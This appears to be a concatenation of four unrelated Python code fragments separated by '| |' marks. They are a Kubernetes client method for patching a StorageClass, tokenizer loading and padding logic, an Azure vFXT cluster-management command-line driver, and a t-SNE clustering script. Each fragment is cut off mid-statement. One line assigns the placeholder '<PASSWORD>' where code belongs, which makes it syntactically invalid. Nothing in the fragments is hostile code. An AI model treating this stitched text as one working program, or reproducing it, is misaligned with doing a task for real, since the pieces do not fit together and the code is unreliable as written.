_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_storage_v1beta1_storage_class(self, name, body, **kwargs):
"""
partially update the specified StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_storage_v1beta1_storage_class(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StorageClass (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1beta1StorageClass
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_storage_v1beta1_storage_class_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_storage_v1beta1_storage_class_with_http_info(name, body, **kwargs)
return data
def patch_storage_v1beta1_storage_class_with_http_info(self, name, body, **kwargs):
"""
partially update the specified StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_storage_v1beta1_storage_class_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StorageClass (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1beta1StorageClass
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_storage_v1beta1_storage_class" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_storage_v1beta1_storage_class`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_storage_v1beta1_storage_class`")
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# | |
not None and isinstance(model_max_length, (int, float)):
init_kwargs["model_max_length"] = min(init_kwargs.get("model_max_length", int(1e30)), model_max_length)
# Merge resolved_vocab_files arguments in init_kwargs.
added_tokens_file = resolved_vocab_files.pop("added_tokens_file", None)
for args_name, file_path in resolved_vocab_files.items():
if args_name not in init_kwargs:
init_kwargs[args_name] = file_path
# Instantiate tokenizer.
try:
tokenizer = cls(*init_inputs, **init_kwargs)
except OSError:
raise OSError(
"Unable to load vocabulary from file. "
"Please check that the provided vocabulary is accessible and not corrupted."
)
# Save inputs and kwargs for saving and re-loading with ``save_pretrained``
tokenizer.init_inputs = init_inputs
tokenizer.init_kwargs = init_kwargs
# If there is a complementary special token map, load it
special_tokens_map_file = resolved_vocab_files.pop("special_tokens_map_file", None)
if special_tokens_map_file is not None:
with open(special_tokens_map_file, encoding="utf-8") as special_tokens_map_handle:
special_tokens_map = json.load(special_tokens_map_handle)
for key, value in special_tokens_map.items():
if isinstance(value, dict):
value = AddedToken(**value)
elif isinstance(value, list):
value = [AddedToken(**token) if isinstance(token, dict) else token for token in value]
setattr(tokenizer, key, value)
# Add supplementary tokens.
special_tokens = tokenizer.all_special_tokens
if added_tokens_file is not None:
with open(added_tokens_file, encoding="utf-8") as added_tokens_handle:
added_tok_encoder = json.load(added_tokens_handle)
# Sort added tokens by index
added_tok_encoder_sorted = list(sorted(added_tok_encoder.items(), key=lambda x: x[1]))
for token, index in added_tok_encoder_sorted:
assert index == len(tokenizer), (
f"Non-consecutive added token '{token}' found. "
f"Should have index {len(tokenizer)} but has index {index} in saved vocabulary."
)
tokenizer.add_tokens(token, special_tokens=bool(token in special_tokens))
# Check all our special tokens are registered as "no split" token (we don't cut them) and are in the vocab
added_tokens = tokenizer.sanitize_special_tokens()
if added_tokens:
logger.warning(
"Special tokens have been added in the vocabulary, make sure the associated word embedding are fine-tuned or trained."
)
return tokenizer
def save_pretrained(self, save_directory: str) -> Tuple[str]:
if os.path.isfile(save_directory):
logger.error("Provided path ({}) should be a directory, not a file".format(save_directory))
return
os.makedirs(save_directory, exist_ok=True)
special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE)
added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE)
tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE)
tokenizer_config = copy.deepcopy(self.init_kwargs)
if len(self.init_inputs) > 0:
tokenizer_config["init_inputs"] = copy.deepcopy(self.init_inputs)
for file_id in self.vocab_files_names.keys():
tokenizer_config.pop(file_id, None)
with open(tokenizer_config_file, "w", encoding="utf-8") as f:
f.write(json.dumps(tokenizer_config, ensure_ascii=False))
vocab_files = self.save_vocabulary(save_directory)
return vocab_files + (special_tokens_map_file, added_tokens_file)
def encode(
self,
text: Union[TextInput, PreTokenizedInput, EncodedInput],
text_pair: Optional[Union[TextInput, PreTokenizedInput, EncodedInput]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
return_tensors: Optional[Union[str, TensorType]] = None,
**kwargs
) -> List[int]:
encoded_inputs = self.encode_plus(
text,
text_pair=text_pair,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
return_tensors=return_tensors,
**kwargs,
)
return encoded_inputs["input_ids"]
def num_special_tokens_to_add(self, pair: bool = False) -> int:
raise NotImplementedError
def _get_padding_truncation_strategies(
self, padding=False, truncation=False, max_length=None, pad_to_multiple_of=None, verbose=True, **kwargs
):
"""
Find the correct padding/truncation strategy with backward compatibility
for old arguments (truncation_strategy and pad_to_max_length) and behaviors.
"""
old_truncation_strategy = kwargs.pop("truncation_strategy", "do_not_truncate")
old_pad_to_max_length = kwargs.pop("pad_to_max_length", False)
# Backward compatibility for previous behavior, maybe we should deprecate it:
# If you only set max_length, it activates truncation for max_length
if max_length is not None and padding is False and truncation is False:
if verbose:
logger.warning(
"Truncation was not explicitely activated but `max_length` is provided a specific value, "
"please use `truncation=True` to explicitely truncate examples to max length. "
"Defaulting to 'longest_first' truncation strategy. "
"If you encode pairs of sequences (GLUE-style) with the tokenizer you can select this strategy "
"more precisely by providing a specific strategy to `truncation`."
)
truncation = "longest_first"
# Get padding strategy
if padding is False and old_pad_to_max_length:
if verbose:
warnings.warn(
"The `pad_to_max_length` argument is deprecated and will be removed in a future version, "
"use `padding=True` or `padding='longest'` to pad to the longest sequence in the batch, or "
"use `padding='max_length'` to pad to a max length. In this case, you can give a specific "
"length with `max_length` (e.g. `max_length=45`) or leave max_length to None to pad to the "
"maximal input size of the model (e.g. 512 for Bert).",
FutureWarning,
)
if max_length is None:
padding_strategy = PaddingStrategy.LONGEST
else:
padding_strategy = PaddingStrategy.MAX_LENGTH
elif padding is not False:
if padding is True:
padding_strategy = PaddingStrategy.LONGEST # Default to pad to the longest sequence in the batch
elif not isinstance(padding, PaddingStrategy):
padding_strategy = PaddingStrategy(padding)
else:
padding_strategy = PaddingStrategy.DO_NOT_PAD
# Get truncation strategy
if truncation is False and old_truncation_strategy != "do_not_truncate":
if verbose:
warnings.warn(
"The `truncation_strategy` argument is deprecated and will be removed in a future version, "
"use `truncation=True` to truncate examples to a max length. You can give a specific "
"length with `max_length` (e.g. `max_length=45`) or leave max_length to None to truncate to the "
"maximal input size of the model (e.g. 512 for Bert). "
" If you have pairs of inputs, you can give a specific truncation strategy selected among "
"`truncation='only_first'` (will only truncate the first sentence in the pairs) "
"`truncation='only_second'` (will only truncate the second sentence in the pairs) "
"or `truncation='longest_first'` (will iteratively remove tokens from the longest sentence in the pairs).",
FutureWarning,
)
truncation_strategy = TruncationStrategy(old_truncation_strategy)
elif truncation is not False:
if truncation is True:
truncation_strategy = (
TruncationStrategy.LONGEST_FIRST
) # Default to truncate the longest sequences in pairs of inputs
elif not isinstance(truncation, TruncationStrategy):
truncation_strategy = TruncationStrategy(truncation)
else:
truncation_strategy = TruncationStrategy.DO_NOT_TRUNCATE
# Set max length if needed
if max_length is None:
if padding_strategy == PaddingStrategy.MAX_LENGTH:
if self.model_max_length > LARGE_INTEGER:
if verbose:
logger.warning(
"Asking to pad to max_length but no maximum length is provided and the model has no predefined maximum length. "
"Default to no padding."
)
padding_strategy = PaddingStrategy.DO_NOT_PAD
else:
max_length = self.model_max_length
if truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE:
if self.model_max_length > LARGE_INTEGER:
if verbose:
logger.warning(
"Asking to truncate to max_length but no maximum length is provided and the model has no predefined maximum length. "
"Default to no truncation."
)
truncation_strategy = TruncationStrategy.DO_NOT_TRUNCATE
else:
max_length = self.model_max_length
# Test if we have a padding token
if padding_strategy != PaddingStrategy.DO_NOT_PAD and (not self.pad_token or self.pad_token_id < 0):
raise ValueError(
"Asking to pad but the tokenizer does not have a padding token. "
"Please select a token to use as `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` "
"or add a new pad token via `tokenizer.add_special_tokens({'pad_token': '[PAD]'})`."
)
# Check that we will truncate to a multiple of pad_to_multiple_of if both are provided
if (
truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE
and padding_strategy != PaddingStrategy.DO_NOT_PAD
and pad_to_multiple_of is not None
and max_length is not None
and (max_length % pad_to_multiple_of != 0)
):
raise ValueError(
f"Truncation and padding are both activated but "
f"truncation length ({max_length}) is not a multiple of pad_to_multiple_of ({pad_to_multiple_of})."
)
return padding_strategy, truncation_strategy, max_length, kwargs
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
is_split_into_words: bool = False,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
# Input type checking for clearer error
assert isinstance(text, str) or (
isinstance(text, (list, tuple))
and (
len(text) == 0
or (
isinstance(text[0], str)
or (isinstance(text[0], (list, tuple)) and (len(text[0]) == 0 or isinstance(text[0][0], str)))
)
)
), (
"text input must of type `str` (single example), `List[str]` (batch or single pretokenized example) "
"or `List[List[str]]` (batch of pretokenized examples)."
)
assert (
text_pair is None
or isinstance(text_pair, str)
or (
isinstance(text_pair, (list, tuple))
and (
len(text_pair) == 0
or (
isinstance(text_pair[0], str)
or (
isinstance(text_pair[0], (list, tuple))
and (len(text_pair[0]) == 0 or isinstance(text_pair[0][0], str))
)
)
)
)
), (
"text_pair input must of type `str` (single example), `List[str]` (batch or single pretokenized example) "
"or `List[List[str]]` (batch of pretokenized examples)."
)
is_batched = bool(
(not is_split_into_words and isinstance(text, (list, tuple)))
or (
is_split_into_words and isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
)
)
if is_batched:
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
return self.batch_encode_plus(
| |
Service.AZURE_ENVIRONMENTS['AzureUSGovernment']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureUSGovernment']['storage_suffix']
if args.azure_environment == 'china':
args.azure_endpoint_base_url = Service.AZURE_ENVIRONMENTS['AzureChinaCloud']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureChinaCloud']['storage_suffix']
if args.azure_environment == 'germany':
args.azure_endpoint_base_url = Service.AZURE_ENVIRONMENTS['AzureGermanCloud']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureGermanCloud']['storage_suffix']
if args.on_instance:
service = Service.on_instance_init(
proxy_uri=args.proxy_uri,
subscription_id=args.subscription_id,
application_id=args.application_id,
application_secret=args.application_secret,
tenant_id=args.tenant_id,
resource_group=args.resource_group,
network_resource_group=args.network_resource_group,
storage_resource_group=args.storage_resource_group,
network=args.azure_network, subnet=args.azure_subnet,
no_connection_test=args.skip_check,
skip_load_defaults=args.skip_load_defaults,
endpoint_base_url=args.azure_endpoint_base_url,
storage_suffix=args.azure_storage_suffix,
storage_account=args.storage_account,
private_range=args.cluster_range,
)
else:
if args.from_environment:
if not all([args.resource_group, args.location, args.azure_network, args.azure_subnet]):
logger.error("Arguments azure-network, azure-subnet, location, and resource_group are required with environment")
parser.exit(1)
else:
if not all([args.application_id, args.application_secret, args.tenant_id]):
logger.error("Arguments tenant-id, application-id, and application-secret are required")
parser.exit(1)
if not args.subscription_id:
subscriptions = Service._list_subscriptions(
application_id=args.application_id,
application_secret=args.application_secret,
tenant_id=args.tenant_id)
args.subscription_id = subscriptions[0]['subscriptionId']
if not all([args.subscription_id, args.azure_network, args.azure_subnet, args.resource_group, args.location]):
logger.error("Arguments subscription-id, azure-network, azure-subnet, resource-group, and location are required")
parser.exit(1)
opts = {
'subscription_id': args.subscription_id,
'application_id': args.application_id,
'application_secret': args.application_secret,
'tenant_id': args.tenant_id,
'resource_group': args.resource_group,
'network_resource_group': args.network_resource_group,
'storage_account': args.storage_account,
'storage_resource_group': args.storage_resource_group,
'location': args.location,
'network': args.azure_network,
'subnet': args.azure_subnet,
'zone': args.azure_zones,
'proxy_uri': args.proxy_uri,
'private_range': args.cluster_range,
'no_connection_test': args.skip_check,
'skip_load_defaults': args.skip_load_defaults,
'endpoint_base_url': args.azure_endpoint_base_url,
'storage_suffix': args.azure_storage_suffix,
}
if args.from_environment:
service = Service.environment_init(**opts)
else:
service = Service(**opts)
service._get_user_shelveable = _get_user_shelveable_azure
if args.ssh_key:
try:
with open(args.ssh_key) as f:
ssh_key_data = f.read()
if 'rsa' not in ssh_key_data:
raise Exception("The SSH key must be of type RSA")
args.ssh_key = ssh_key_data
except Exception as e:
logger.error("Failed to read SSH key: {}".format(e))
parser.exit(1)
if args.create and (not (args.no_corefiler or args.nfs_mount) and not args.storage_account):
logger.error("You must specify a storage account for cloud corefilers")
parser.exit(1)
if args.add_nodes:
if args.nodes > 3:
logger.error("Adding more than 3 cluster nodes is not supported")
parser.exit(1)
# off for Azure unless requested
args.disable_bucket_encryption = True
if args.enable_bucket_encryption:
args.disable_bucket_encryption = False
if args.ultra_ssd:
args.data_disk_type = 'UltraSSD_LRS'
if args.azure_tag:
args.azure_tag = {n.split(':')[0]: (n.split(':')[1] or '') for n in args.azure_tag if len(n.split(':')) > 1}
# generic service options
service.POLLTIME = args.poll_time
if args.node_cache_size:
if any([args.data_disk_count, args.data_disk_size]):
logger.warning("Overriding --data-disk-count and --data-disk-size with --node-cache-size")
disk_config = service._cache_to_disk_config(args.node_cache_size, disk_type=args.data_disk_type, machine_type=args.instance_type)
args.data_disk_count = disk_config[0]
args.data_disk_size = disk_config[1]
logger.debug("Cache size {} specified, setting disk count and size to {}, {}".format(args.node_cache_size, args.data_disk_count, args.data_disk_size))
if args.create:
# run a service check first
try:
if not args.skip_check:
service.check()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error(e)
parser.exit(1)
if not args.no_corefiler:
if not args.disable_bucket_encryption and not args.core_filer_key_file:
err_msg = 'Container/bucket encryption has been specified but a corefiler key file path was not supplied. To use container/bucket encryption you need to also specify a file path using --core-filer-key-file into which the generated key will be saved.'
logger.error(err_msg)
parser.exit(1)
# minimum args for create
if not all([args.instance_type, args.cluster_name, args.admin_password]):
logger.error("Arguments instance-type, cluster-name, and admin-password are required")
parser.exit(1)
if args.nodes and args.nodes < 3: # we default below if nothing was specified
logger.error("Cluster sizes below 3 are not supported")
parser.exit(1)
if args.nodes and args.nodes > 24:
logger.error("Cluster sizes above 24 are not supported")
parser.exit(1)
# cluster create options
options = {
'size': args.nodes or 3,
'data_disk_count': args.data_disk_count,
'data_disk_size': args.data_disk_size,
'data_disk_type': args.data_disk_type,
'data_disk_iops': args.data_disk_iops,
'data_disk_mbps': args.data_disk_mbps,
'root_image': args.image_id,
'root_size': args.root_size,
'iamrole': args.iam_role,
'placement_group': args.placement_group,
'dedicated_tenancy': args.dedicated_tenancy,
'wait_for_state': args.wait_for_state,
'wait_for_state_duration': args.wait_for_state_duration,
'security_group_ids': args.security_group,
'network_security_group': args.network_security_group,
'config_expiration': args.configuration_expiration,
'tags': args.aws_tag or args.gce_tag or args.azure_tag,
'labels': args.labels,
'metadata': args.metadata,
'skip_cleanup': args.skip_cleanup,
'skip_node_renaming': args.skip_node_renaming,
'proxy_uri': args.cluster_proxy_uri,
'disk_encryption': not args.no_disk_encryption,
'ebs_optimized': None if not args.no_ebs_optimized else not args.no_ebs_optimized, # use machine defaults
'auto_public_address': args.public_address,
'management_address': args.management_address,
'address_range_start': args.cluster_address_range_start,
'address_range_end': args.cluster_address_range_end,
'address_range_netmask': args.cluster_address_range_netmask,
'instance_addresses': args.instance_addresses or args.azure_instance_addresses,
'trace_level': args.trace_level,
'timezone': args.timezone,
'admin_ssh_data': args.ssh_key, # azure ssh key
'azure_role': args.azure_role,
'azure_identity': args.azure_identity,
'key_name': args.ssh_key, # aws ssh key
'join_wait': args.join_wait or None,
'service_account': args.service_account,
'scopes': args.scopes,
'enable_boot_diagnostics': args.enable_boot_diagnostics,
'root_disk_caching': args.root_disk_caching,
'data_disk_caching': args.data_disk_caching,
}
# prune out unfortunate command line defaults
options = {k: v for k, v in viewitems(options) if v is not None and v != ''}
logger.info("Creating {} cluster {}".format(args.instance_type, args.cluster_name))
try:
cluster = Cluster.create(service, args.instance_type, args.cluster_name, args.admin_password, **options)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error(e)
logger.error("Failed to create cluster")
parser.exit(1)
corefiler_name = None
if not args.no_corefiler:
try:
if args.nfs_mount:
corefiler_name = _add_nfs_corefiler(cluster, logger, args)
else:
corefiler_name = _add_bucket_corefiler(cluster, logger, args)
except (KeyboardInterrupt, Exception) as e:
if args.debug:
logger.exception(e)
logger.error(e)
if not args.skip_cleanup:
cluster.destroy(quick_destroy=True)
logger.error("Failed to configure core filer")
parser.exit(1)
if not args.no_vserver:
try:
logger.info("Creating vserver {}".format(args.vserver))
vserver_opts = {
'netmask': args.vserver_address_range_netmask,
'start_address': args.vserver_address_range_start,
'end_address': args.vserver_address_range_end,
'home_addresses': args.vserver_home_addresses,
}
cluster.add_vserver(args.vserver, **vserver_opts)
if corefiler_name:
logger.info("Creating vserver junction {}".format(corefiler_name))
junction_opts = {
'path': args.junction
}
if args.nfs_mount:
mount = args.nfs_mount.split(':')[-1]
junction_opts['path'] = args.junction or '/{}'.format(corefiler_name)
junction_opts['export'] = mount
junction_opts['subdir'] = args.subdir
cluster.add_vserver_junction(args.vserver, corefiler_name, **junction_opts)
except (KeyboardInterrupt, Exception) as e:
if args.debug:
logger.exception(e)
logger.error(e)
if not args.skip_cleanup:
cluster.destroy(quick_destroy=True)
logger.error("Failed to configure vserver")
parser.exit(1)
cluster_version = cluster.xmlrpc().cluster.get()['activeImage']
logger.info("{} version {}".format(cluster.name, cluster_version))
logger.info("{} management address: {}".format(cluster.name, cluster.mgmt_ip))
logger.info("{} nodes: {}".format(cluster.name, ' '.join([n.id() for n in cluster.nodes])))
logger.info("Complete")
elif args.start:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_on():
logger.error("Cluster is already running.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Starting cluster with nodes {}".format(node_names))
try:
cluster.start()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to start cluster: {}".format(e))
parser.exit(1)
if all([args.management_address, args.admin_password]):
cluster.mgmt_ip = args.management_address
cluster.admin_password = args.admin_password
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, conn_retries=20, duration=args.wait_for_state_duration)
logger.info("Complete")
elif args.stop:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_off():
logger.error("Cluster is already stopped.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Stopping cluster with nodes {}".format(node_names))
try:
cluster.stop()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to stop cluster: {}".format(e))
parser.exit(1)
logger.info("Complete")
elif args.destroy:
# minimum args for destroy
if not all([args.management_address, args.admin_password]):
logger.error("Arguments management-address and admin-password are required")
parser.exit(1)
cluster = _get_cluster(service, logger, args)
if not cluster:
logger.error("Cluster not found.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Destroying cluster with nodes {}".format(node_names))
try:
cluster.destroy(quick_destroy=args.quick_destroy)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to destroy cluster: {}".format(e))
parser.exit(1)
logger.info("Complete")
elif args.shelve:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_shelved():
logger.error("Nodes are already shelved.")
parser.exit(1)
node_names = ' '.join([i.id() for i in cluster.nodes])
logger.info("Shelving nodes {}".format(node_names))
cluster.shelve()
logger.info("Completed shelving nodes {}".format(node_names))
elif args.unshelve:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if not cluster.is_shelved():
logger.error("Nodes are not shelved.")
parser.exit(1)
node_names = ' '.join([i.name() for i in cluster.nodes])
logger.info("Unshelving nodes {}".format(node_names))
try:
cluster.unshelve(count_override=args.data_disk_count, size_override=args.data_disk_size, type_override=args.data_disk_type, kms_key_id=args.kms_key_id)
except Exception as e:
logger.exception(e)
cluster.refresh()
if not cluster.is_on():
cluster.shelve()
logger.error("Failed to unshelve cluster")
parser.exit(1)
# if a real cluster, we can run healthcheck
if all([args.management_address, args.admin_password]) and not args.instances:
cluster.mgmt_ip = args.management_address
cluster.admin_password = <PASSWORD>
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, conn_retries=20, duration=args.wait_for_state_duration)
logger.info("Completed unshelving nodes {}".format(node_names))
elif args.add_nodes:
if not all([args.nodes, args.management_address, args.admin_password]):
logger.error("Arguments nodes, management-address, and admin-password are required")
parser.exit(1)
cluster = _get_cluster(service, logger, args)
if not cluster:
logger.error("Cluster not found.")
parser.exit(1)
if args.nodes + len(cluster.nodes) > 24:
logger.error("Cluster sizes above 24 are not supported")
parser.exit(1)
options = {
'root_image': args.image_id,
'root_size': args.root_size,
'data_disk_count': args.data_disk_count,
'data_disk_size': args.data_disk_size,
'data_disk_type': args.data_disk_type,
'data_disk_iops': args.data_disk_iops,
'data_disk_mbps': args.data_disk_mbps,
'tags': args.aws_tag or args.gce_tag or args.azure_tag,
'metadata': args.metadata,
'skip_cleanup': args.skip_cleanup,
'skip_node_renaming': args.skip_node_renaming,
'machine_type': args.instance_type,
'auto_public_address': args.public_address,
'join_wait': args.join_wait or None,
'service_account': args.service_account,
'home_addresses': args.vserver_home_addresses,
'key_name': args.ssh_key, # aws ssh key
'admin_ssh_data': args.ssh_key, # azure ssh key
'instance_addresses': args.instance_addresses,
'azure_role': args.azure_role,
'azure_identity': args.azure_identity,
'zone': args.zone or args.azure_zones,
}
# prune out unfortunate command line defaults
options = {k: v for k, v in viewitems(options) if v is not None and v != ''}
try:
count = args.nodes or 1
logger.info("Adding {} node(s) to {}.".format(count, cluster.name))
cluster.add_nodes(count, **options)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to add nodes to cluster: {}".format(e))
parser.exit(1)
logger.info("Rebalancing directory managers")
try:
cluster.rebalance_directory_managers()
except vFXTStatusFailure as e:
logger.error(e)
if 'A directory manager rebalance operation is already scheduled' in str(e):
parser.exit(1)
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, duration=args.wait_for_state_duration)
logger.info("Complete")
elif args.interact:
from vFXT.serviceInstance import ServiceInstance # handy import #pylint: disable=unused-variable,possibly-unused-variable
local = globals()
local.update(locals())
banner = "\n--- Service object available as 'service' ---\n"
try:
from IPython import start_ipython
logger.info(banner)
start_ipython(argv=['--classic', '--no-banner'], user_ns=local)
except ImportError:
from code import interact
interact(local=local, banner=banner)
elif args.upgrade_alternate_image:
if not args.upgrade_url:
logger.error("Provide a | |
<reponame>darylperalta/DTC
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.optim import SGD
from torch.autograd import Variable
from sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score
from sklearn.metrics import adjusted_rand_score as ari_score
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from utils.util import cluster_acc, Identity, AverageMeter, seed_torch, str2bool
from utils import ramps
from models.resnet_3x3 import ResNet, BasicBlock
from modules.module import feat2prob, target_distribution
from data.cifarloader import CIFAR10Loader
from tqdm import tqdm
import numpy as np
import warnings
import random
import os
warnings.filterwarnings("ignore", category=UserWarning)
import torch.nn.functional as F
from sklearn.manifold import TSNE
import pandas as pd
import seaborn as sns
# class ResNet_features(nn.Module):
# def __init__(self, resnet):
# super(ResNet_features, self).__init__()
# self.in_planes = 64
#
# self.conv1 = resnet.conv1
# self.bn1 = resnet.bn1
# self.layer1 = resnet.layer1
# self.layer2 = resnet.layer2
# self.layer3 = resnet.layer3
# self.layer4 = resnet.layer4
# # self.linear = nn.Linear(512*block.expansion, num_classes)
#
# # def _make_layer(self, block, planes, num_blocks, stride):
# # strides = [stride] + [1]*(num_blocks-1)
# # layers = []
# # for stride in strides:
# # layers.append(block(self.in_planes, planes, stride))
# # self.in_planes = planes * block.expansion
# # return nn.Sequential(*layers)
#
# def forward(self, x):
# out = F.relu(self.bn1(self.conv1(x)))
# out = self.layer1(out)
# out = self.layer2(out)
# out = self.layer3(out)
# out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
# out = out.view(out.size(0), -1)
# # out = self.linear(out)
# return out
def plot_tsne(eval_loader, model,device, n_clusters=5, filename='tsne.png'):
torch.manual_seed(1)
# model = model.to(device)
# cluster parameter initiate
# feat_model = nn.Sequential(*list(model.children())[:-1])
feat_model = model
# feat_model = ResNet_features(model)
feat_model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = feat_model(x)
# print('feat', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
mus_tsne = TSNE(n_components=2).fit_transform(feats)
# kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(mus_tsne)
x = mus_tsne[:,0]
y = mus_tsne[:,1]
data = pd.DataFrame()
data['x'] = x
data['y'] = y
data['label'] = targets
print('data label')
print(data['label'])
print('x', x)
print('feats', feats)
# data['label'] = kmeans.labels_
#current_palette = sns.color_palette()
#sns.palplot(current_palette)
ax = sns.scatterplot(
x="x", y="y",
hue="label",
data=data,
palette=sns.color_palette("hls", n_clusters),
alpha=0.3
)
fig = ax.get_figure()
fig.savefig(filename)
def plot_tsne_train(eval_loader, model,device, n_clusters=5, filename='tsne.png'):
torch.manual_seed(1)
# model = model.to(device)
# cluster parameter initiate
# feat_model = nn.Sequential(*list(model.children())[:-1])
feat_model = model
# feat_model = ResNet_features(model)
feat_model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
# for _, ((x, _), label, idx) in enumerate(eval_loader):
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = feat_model(x)
# print('feat', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
mus_tsne = TSNE(n_components=2).fit_transform(feats)
# kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(mus_tsne)
x = mus_tsne[:,0]
y = mus_tsne[:,1]
data = pd.DataFrame()
data['x'] = x
data['y'] = y
data['label'] = targets
print('data label')
print(data['label'])
print('x', x)
print('feats', feats)
# data['label'] = kmeans.labels_
#current_palette = sns.color_palette()
#sns.palplot(current_palette)
ax = sns.scatterplot(
x="x", y="y",
hue="label",
data=data,
palette=sns.color_palette("hls", n_clusters),
alpha=0.3
)
fig = ax.get_figure()
fig.savefig(filename)
def init_prob_kmeans(model, eval_loader, args):
torch.manual_seed(1)
model = model.to(device)
# cluster parameter initiate
model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = model(x)
print('x shape', x.shape)
# print('feat init', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
